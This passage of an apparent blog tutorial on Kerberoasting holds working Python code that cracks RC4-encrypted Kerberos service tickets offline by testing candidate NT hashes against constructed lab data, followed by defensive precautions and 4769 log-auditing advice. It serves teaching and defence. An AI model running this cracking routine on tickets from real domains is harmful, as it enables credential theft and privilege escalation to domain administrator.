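    """Return the plaintext, or None when the checksum does not verify (wrong key)."""
    k1 = _hmac_md5(nt_hash, struct.pack("<I", usage))
    checksum, body = edata[:16], edata[16:]
    k3 = _hmac_md5(k1, checksum)
    data = rc4(k3, body)
    if not hmac.compare_digest(_hmac_md5(k1, data), checksum):
        return None
    return data[8:]


def crack_rc4_ticket(edata: bytes, candidate_nt_hashes):
    """Offline attack on the ticket's enc-part: try each candidate NT hash until
    the HMAC verifies. The KDC is never contacted, which is why nothing alerts."""
    for hex_hash in candidate_nt_hashes:
        if rc4_hmac_decrypt(bytes.fromhex(hex_hash), edata) is not None:
            return hex_hash
    return None


# Constructed lab data. The service key is the NT hash of the (deliberately weak)
# password "password"; the plaintext is a stand-in for the DER-encoded EncTicketPart.
SERVICE_NT_HASH = "8846f7eaee8fb117ad06bdd830b7586c"
TICKET_PLAINTEXT = b"EncTicketPart{cname=ning,crealm=LABTEST.COM,sname=MSSQLSvc/computer1.labtest.com:1433}"
SAMPLE_TICKET = rc4_hmac_encrypt(bytes.fromhex(SERVICE_NT_HASH), TICKET_PLAINTEXT)

# Candidate list as a cracker would build it from a wordlist: two wrong keys
# (the empty-password hash and a constructed value) before the right one.
CANDIDATES = [
    "31d6cfe0d16ae931b73c59d7e0c089c0",   # NT hash of the empty password
    "0123456789abcdef0123456789abcdef",   # constructed wrong key
    SERVICE_NT_HASH,
]

if __name__ == "__main__":
    print("cracked service key:", crack_rc4_ticket(SAMPLE_TICKET, CANDIDATES))
```

Each candidate costs three HMAC-MD5 computations and one RC4 pass, with no interaction with the domain. An AES256 ticket (etype 18) needs the account's AES key, which is derived from the password with PBKDF2 over thousands of iterations and a realm-specific salt, so the same wordlist costs orders of magnitude more to try; that, not any impossibility, is what makes enforcing AES worthwhile.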

 Precautions

Against Kerberoasting the following precautions apply.

  1. Make service account passwords longer than 25 characters, random, and rotate them regularly; better still, use group Managed Service Accounts (gMSA), whose long random passwords are rotated automatically.
  2. Do not let the default AES256_HMAC encryption type be downgraded to RC4_HMAC_MD5: set msDS-SupportedEncryptionTypes on service accounts to AES only. An AES-encrypted ticket cannot be cracked with tgsrepcrack.py.
  3. An attacker can request or sniff Kerberos TGS tickets at will. Forcing AES_256_HMAC for ticket encryption does not make the tickets uncrackable (hashcat supports the AES ticket modes), but each guess becomes orders of magnitude more expensive, so with a strong password the ticket is of no use to the attacker.
  4. Many service accounts in intranets have been granted excessive rights and have weak passwords. An attacker who cracks a ticket may go from domain user to domain administrator, so give service accounts only the rights they need and enforce strong passwords.
  5. During log auditing, focus on event ID 4769 (a Kerberos service ticket was requested). Filter on Ticket Encryption Type 0x17 (RC4) with a result code of 0x0, and look for one account requesting tickets for many different SPNs in a short time; if such 4769 events pile up, check the systems involved for malicious behaviour.
     

Original page: https://yzsam.com/2022/161/202206100023570180.html

Copyright notice
This article was written by nigo134; when reproducing it, please include a link to the original. Thank you.